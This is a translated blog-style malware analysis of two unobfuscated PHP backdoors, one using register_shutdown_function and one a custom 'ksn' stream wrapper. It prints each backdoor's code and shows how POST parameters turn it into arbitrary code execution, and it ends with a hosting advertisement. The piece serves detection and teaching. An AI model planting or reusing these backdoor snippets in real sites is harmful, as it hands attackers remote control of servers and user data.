Recognize and neutralize. Search for unorthodox backdoors

Original author: DENIS SINEGUBKO
  • Transfer
According to our estimates, 72% of infected sites use hidden remote administration programs - backdoors. With their help, scammers get remote access to your site, and of course, what this threatens the owner: receiving and transmitting confidential user data, launching malware, destroying information, etc.



From time to time, you have to deal with unique backdoors that do not include normal PHP functions, such as eval, create_function, preg_replace, assert, base64_decode, etc.

Such backdoors often look like source code without any obfuscation, there are no encrypted lines, string concatenation, formatting of program code, and changes in its structure. However, these backdoors still allow an attacker to run arbitrary code on your server.

Backdoor and Shutdown Function


Let's start simple. The comment in the file says this is @package win.error.Libraries with function:

function win() 
 { register_shutdown_function($_POST['d']('', $_POST['f']($_POST['c']))); }

In this case, we consider $ _POST as something suspicious. But is this really malicious code?

register_shutdown_function registers a function that will execute when the script completes. Therefore, regardless of the code that you see in the script, after its completion, the callback function from the register_shutdown_function function will be executed.

The function executed after the script will look like this:

$_POST['d']('', $_POST['f']($_POST['c']))

In any case, the code looks cryptic. Take a look at it through the eyes of a hacker and suppose that he activated a script with the following POST parameters:

d = create_function
e = base64_decode
with = some_base64_encoded_malicious_PHP_code

We get the following:

create_function('', base64_decode(some_base64_encoded_malicious_PHP_code))

Now it looks like a normal backdoor. This code does not require an additional call, as register_shutdown_function registers a callback function, which will automatically execute after the script is finished.

Backdoor and Stream Wrapper


Now let's complicate the task of recognizing backdoors a bit.

Before us is a comment - @package Stream.ksn.Libraries, which means that the file contains the Stream class and a function for working with streams stream_wrapper_register that registers the wrapper using the ksn protocol.

class Stream 
{ 
   function stream_open($path, $mode, $options, &$opened_path) 
   { 
       $url = parse_url($path); 
       $f = $_POST['d']('', $url["host"]);
       $f(); 
       return true; 
    } 
} 
stream_wrapper_register("ksn", "Stream"); 
// Register connect the library Stream 
$fp = fopen('ksn://'.$_POST['f']($_POST['c']), '');

And now, in order. For the owners of the site and some webmasters, this code looks quite legitimate - typical files in content management systems or third-party plug-ins - it’s probably not entirely clear what it is doing and what it is, but if there is one, it’s apparently necessary and useful. Does anyone know what ksn streams are?

But hey - we see that the code contains POST data. But this is already suspicious, since POST parameters can be controlled by attackers. It is not yet clear which POST data is used in this code. Let's play cryptographs and use the decoding technique, replace the letters in the phrase.

Let's start with this part of the code from the stream_open function:

$f = $_POST['d']('', $url["host"]);

It is suspicious when the POST parameter is used as the name of a function. The code assumes that the value of $ _POST ['d'] can be create_function. If so, then $ url ["host"] contains some executable code, but the $ url variable parses the URL and returns its components using the standard PHP function parse_url. This means that $ url ["host"] is only part of the host part of the URL path.

I doubt that the domain name may contain executable PHP code ... right?

Let's check where we get the $ path parameter in function stream_open: in theory, it will contain the parsed URL obtained when using the parse_url function. To find out, consider this part of the code:

stream_wrapper_register("ksn", "Stream");

The stream_wrapper_register function registers the ksn protocol and the Stream class that will work with this protocol. The Stream class follows the prototype condition of streamWrapper, namely streamWrapper :: stream_open - opens a file or URL, and will be called immediately after the protocol is initialized.

stream_open should follow the description, where $ path is the URL passed to the fopen () function, which assigns the named resource specified in the filename argument to the stream:

public bool streamWrapper::stream_open ( string $path , string $mode ,
 int $options , string &$opened_path )

In our case, fopen opens the URL ksn: //:

$fp = fopen('ksn://'.$_POST['f']($_POST['c']), '');

As a result, $ path results in the string: 'ksn: //'.$_POST [' f '] ($ _POST [' c ']),'

This will create a URL in which part of the host is executable malicious PHP code.

Is it possible to create a domain name or IP address that will actually be a complete PHP code for attacking websites? The parse_url function does not check the URLs for correctness, but simply breaks them into pieces. Everything from: // to the first slash (/) or colon (:) is considered the main part of the URL.

For example, if you set parse_url function: ksn: // eval (base64_decode ($ _POST ["code"])); the main part of the URL will be returned: eval (base64_decode ($ _ POST ["code"]));

Following the backdoor logic, we get the following POST parameters:

e = base64_decode
c = some_base64_encoded_malicious_PHP_code

In this case, the wording of fopen looks like this:

$fp = fopen('ksn://base64_decode(base64_encoded_malicious_PHP_code)', '');

Now, back to the stream_open function, this will be the last piece of the puzzle. Now we know what URL can be passed to the file of the fopen function:

$f = $_POST['d']('', $url["host"]);

And the pants turn, the pants turn - into an elegant string:

$f = create_function('', base64_decode(base64_encoded_malicious_PHP_code));

The following line simply executes the backdoor code:

$f();

In other words, all that is required to execute the backdoor code is to call the fopen () function with the generated ksn: // URL.

The example above was shown how attackers can use less well-known PHP functions to create vulnerabilities. Given that there are thousands of PHP files on a typical website, it’s hardly possible to carefully check each file. Therefore, finding malware on a site is not an easy task. You cannot rely solely on manual code verification and simple scripts that scan known malware patterns.

As an advertisement. Stock! Only now get up to 4 months of free use of VPS (KVM) with dedicated drives in the Netherlands and the USA(configurations from VPS (KVM) - E5-2650v4 (6 Cores) / 10GB DDR4 / 240GB SSD or 4TB HDD / 1Gbps 10TB - $ 29 / month and above, options with RAID1 and RAID10 are available) , a full-fledged analogue of dedicated servers, when ordering on the term is 1-12 months, the terms of the promotion are here, existing subscribers can get 2 months with a bonus!

How to build the infrastructure of the building. class using Dell R730xd E5-2650 v4 servers costing 9,000 euros for a penny?

Also popular now: